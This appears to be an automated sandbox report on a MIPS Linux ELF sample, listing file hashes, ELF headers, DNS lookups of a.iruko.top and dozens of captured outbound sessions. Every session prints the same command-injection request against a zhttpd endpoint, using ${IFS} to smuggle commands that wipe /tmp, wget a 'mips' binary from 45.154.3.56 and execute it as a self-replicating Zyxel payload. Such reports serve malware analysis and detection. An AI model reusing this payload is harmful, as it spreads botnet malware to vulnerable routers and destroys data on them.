                        SHA-256:9F5255427455994582BE4E99508EDACCEBC956991933EEECE842D1C1AA3DED48
                        SHA-512:F719441742304A1067901C79458688874BCBF6B0BB4D4E5F551DF53FB4628FA55A388073212E764110C5E0E995A547D39363B5CF811D83C2B583E40670320CE2
                        Malicious:false
                        Reputation:low
                        Preview:/tmp/HH5LnBFw1p.elf.
                        Process:/tmp/HH5LnBFw1p.elf
                        File Type:data
                        Category:dropped
                        Size (bytes):20
                        Entropy (8bit):4.021928094887362
                        Encrypted:false
                        SSDEEP:3:Tg53n:Tgpn
                        MD5:F860EC2142E860C1C55B7D2CAE88471B
                        SHA1:833E183E05DFE27F6BC27EB976E5B5AFF238B808
                        SHA-256:9F5255427455994582BE4E99508EDACCEBC956991933EEECE842D1C1AA3DED48
                        SHA-512:F719441742304A1067901C79458688874BCBF6B0BB4D4E5F551DF53FB4628FA55A388073212E764110C5E0E995A547D39363B5CF811D83C2B583E40670320CE2
                        Malicious:false
                        Reputation:low
                        Preview:/tmp/HH5LnBFw1p.elf.
                        Process:/tmp/HH5LnBFw1p.elf
                        File Type:data
                        Category:dropped
                        Size (bytes):20
                        Entropy (8bit):4.021928094887362
                        Encrypted:false
                        SSDEEP:3:Tg53n:Tgpn
                        MD5:F860EC2142E860C1C55B7D2CAE88471B
                        SHA1:833E183E05DFE27F6BC27EB976E5B5AFF238B808
                        SHA-256:9F5255427455994582BE4E99508EDACCEBC956991933EEECE842D1C1AA3DED48
                        SHA-512:F719441742304A1067901C79458688874BCBF6B0BB4D4E5F551DF53FB4628FA55A388073212E764110C5E0E995A547D39363B5CF811D83C2B583E40670320CE2
                        Malicious:false
                        Reputation:low
                        Preview:/tmp/HH5LnBFw1p.elf.
                        File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                        Entropy (8bit):5.104035030737125
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:HH5LnBFw1p.elf
                        File size:194'812 bytes
                        MD5:cde00166105fa6dbbef681f3d2af6926
                        SHA1:64c6a39c144b9f1f0adaec014c3307d91b805ae7
                        SHA256:d1fdb7eb693c9f42f40047e83f613b82325cd7496055bb8cf8926fc54767af58
                        SHA512:25a56905d7027530763ff6d62ca634bbe9d6e0e9736bc915f3be720fd05cbc6a0e3c2c5810286e0c27df6584996a6b2ac08dc4972faab0e3e41fbd8cc78df9d5
                        SSDEEP:3072:lXu5nM714Tu06P3u2wTWt6ll8kj9iejPZFvoX1TI:lXcDTunuColPimZFgXhI
                        TLSH:0B14A81E6E228F7DF668873047B74E25976C23D627E1D684E1ACD1101F6039E681FFA8
                        File Content Preview:.ELF.....................@.`...4.........4. ...(.............@...@...........................F...F....U....`........dt.Q............................<...'.k|...!'.......................<...'.kX...!... ....'9... ......................<...'.k(...!...$....'9q

                        ELF header

                        Class:ELF32
                        Data:2's complement, big endian
                        Version:1 (current)
                        Machine:MIPS R3000
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x400260
                        Flags:0x1007
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:3
                        Section Header Offset:194252
                        Section Header Size:40
                        Number of Section Headers:14
                        Header String Table Index:13
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x4000940x940x8c0x00x6AX004
                        .textPROGBITS0x4001200x1200x270e00x00x6AX0016
                        .finiPROGBITS0x4272000x272000x5c0x00x6AX004
                        .rodataPROGBITS0x4272600x272600x2e740x00x2A0016
                        .ctorsPROGBITS0x46a0d80x2a0d80xc0x00x3WA004
                        .dtorsPROGBITS0x46a0e40x2a0e40x80x00x3WA004
                        .data.rel.roPROGBITS0x46a0f00x2a0f00x1800x00x3WA004
                        .dataPROGBITS0x46a2800x2a2800x49a00x00x3WA0032
                        .gotPROGBITS0x46ec200x2ec200xa480x40x10000003WAp0016
                        .sbssNOBITS0x46f6680x2f6680x500x00x10000003WAp004
                        .bssNOBITS0x46f6c00x2f6680x47780x00x3WA0016
                        .mdebug.abi32PROGBITS0x13e60x2f6680x00x00x0001
                        .shstrtabSTRTAB0x00x2f6680x640x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        LOAD0x00x4000000x4000000x2a0d40x2a0d45.44310x5R E0x10000.init .text .fini .rodata
                        LOAD0x2a0d80x46a0d80x46a0d80x55900x9d601.24890x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Mar 12, 2024 08:50:22.915666103 CET192.168.2.148.8.8.80xfbeeStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:30.336993933 CET192.168.2.148.8.8.80xefd3Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:35.755001068 CET192.168.2.148.8.8.80x991eStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:40.173840046 CET192.168.2.148.8.8.80x60e8Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:47.593132019 CET192.168.2.148.8.8.80x9216Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:51.999965906 CET192.168.2.148.8.8.80x8b3aStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:59.408755064 CET192.168.2.148.8.8.80xaef4Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:06.831094027 CET192.168.2.148.8.8.80xd3e5Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:10.241642952 CET192.168.2.148.8.8.80x3d64Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:13.649408102 CET192.168.2.148.8.8.80xe585Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:21.059789896 CET192.168.2.148.8.8.80x453cStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:28.461147070 CET192.168.2.148.8.8.80xc80cStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:36.880337000 CET192.168.2.148.8.8.80xd86Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:47.289366007 CET192.168.2.148.8.8.80x7965Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:51.703777075 CET192.168.2.148.8.8.80xac9dStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:01.115818024 CET192.168.2.148.8.8.80x5ff1Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:11.526372910 CET192.168.2.148.8.8.80xf3ebStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:19.932811975 CET192.168.2.148.8.8.80xbc8aStandard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:26.352349043 CET192.168.2.148.8.8.80xd97Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Mar 12, 2024 08:50:23.021923065 CET8.8.8.8192.168.2.140xfbeeNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:30.441023111 CET8.8.8.8192.168.2.140xefd3No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:35.859162092 CET8.8.8.8192.168.2.140x991eNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:40.278958082 CET8.8.8.8192.168.2.140x60e8No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:47.686626911 CET8.8.8.8192.168.2.140x9216No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:52.093755007 CET8.8.8.8192.168.2.140x8b3aNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:50:59.514637947 CET8.8.8.8192.168.2.140xaef4No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:06.927239895 CET8.8.8.8192.168.2.140xd3e5No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:10.335122108 CET8.8.8.8192.168.2.140x3d64No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:13.745954990 CET8.8.8.8192.168.2.140xe585No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:21.147300959 CET8.8.8.8192.168.2.140x453cNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:28.567222118 CET8.8.8.8192.168.2.140xc80cNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:36.973896980 CET8.8.8.8192.168.2.140xd86No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:47.385438919 CET8.8.8.8192.168.2.140x7965No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:51:51.801810980 CET8.8.8.8192.168.2.140xac9dNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:01.211047888 CET8.8.8.8192.168.2.140x5ff1No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:11.619870901 CET8.8.8.8192.168.2.140xf3ebNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:20.038131952 CET8.8.8.8192.168.2.140xbc8aNo error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Mar 12, 2024 08:52:26.439785004 CET8.8.8.8192.168.2.140xd97No error (0)a.iruko.top45.154.3.56A (IP address)IN (0x0001)false
                        Session IDSource IPSource PortDestination IPDestination Port
                        0192.168.2.1438924200.10.193.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.984993935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        1192.168.2.14406725.160.184.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.985589027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2192.168.2.1447476184.171.36.226443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.985716105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3192.168.2.145155461.92.203.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.985944033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        4192.168.2.143862699.214.194.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.986099005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        5192.168.2.1453604114.161.187.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.986265898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        6192.168.2.1440036205.199.118.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.986447096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        7192.168.2.1451154181.204.69.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.986665010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        8192.168.2.1434298147.101.74.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.986802101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        9192.168.2.14593788.133.82.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987040997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        10192.168.2.1458696195.164.195.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987163067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        11192.168.2.143715043.170.235.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987339973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        12192.168.2.146077683.206.81.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987510920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        13192.168.2.1442124207.174.235.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987670898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        14192.168.2.1441894185.241.172.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987732887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        15192.168.2.1454878125.213.16.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.987895012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        16192.168.2.146039046.26.176.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.988094091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        17192.168.2.1450982223.79.152.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.988235950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        18192.168.2.1458532184.228.57.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.988500118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        19192.168.2.1434272202.245.110.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.988728046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        20192.168.2.1458686149.20.137.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.988970995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        21192.168.2.1452280222.98.80.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989094019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        22192.168.2.1434606198.135.20.96443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989299059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        23192.168.2.1456516102.142.28.125443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989363909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        24192.168.2.1443494129.202.189.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989481926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        25192.168.2.1448330117.171.125.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989528894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        26192.168.2.1437896159.91.9.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989598036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        27192.168.2.14409982.122.14.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989670038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        28192.168.2.1460358212.116.219.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989763021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        29192.168.2.1458958158.229.127.130443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989785910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        30192.168.2.1446120116.217.175.57443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989873886 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        31192.168.2.144364837.62.40.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.989958048 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        32192.168.2.1455102223.57.129.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990034103 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        33192.168.2.1446362136.217.105.146443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990134001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        34192.168.2.1454988193.209.120.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990252972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        35192.168.2.1452120123.248.110.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990282059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        36192.168.2.1459652193.229.16.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990375042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        37192.168.2.1443836165.255.187.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990452051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        38192.168.2.1446746222.112.141.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990591049 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        39192.168.2.1440458182.66.238.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990657091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        40192.168.2.1445726197.20.49.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990706921 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        41192.168.2.143504612.186.160.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990782976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        42192.168.2.1433100152.144.156.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990886927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        43192.168.2.1445018216.246.145.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.990966082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        44192.168.2.145799635.157.9.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991035938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        45192.168.2.1442328128.18.49.171443
                        TimestampBytes transferredDirectionData
